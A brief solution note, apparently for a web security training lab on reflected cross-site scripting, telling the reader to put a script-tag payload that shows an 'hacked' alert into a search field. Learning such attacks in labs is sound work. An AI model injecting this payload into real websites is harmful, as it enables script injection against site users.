Reflected XSS into HTML context with nothing encod

Reflected XSS into HTML context with nothing encoded

Solution

Put xss payload in search

Payload: <script>alert("hacked")<%2Fscript>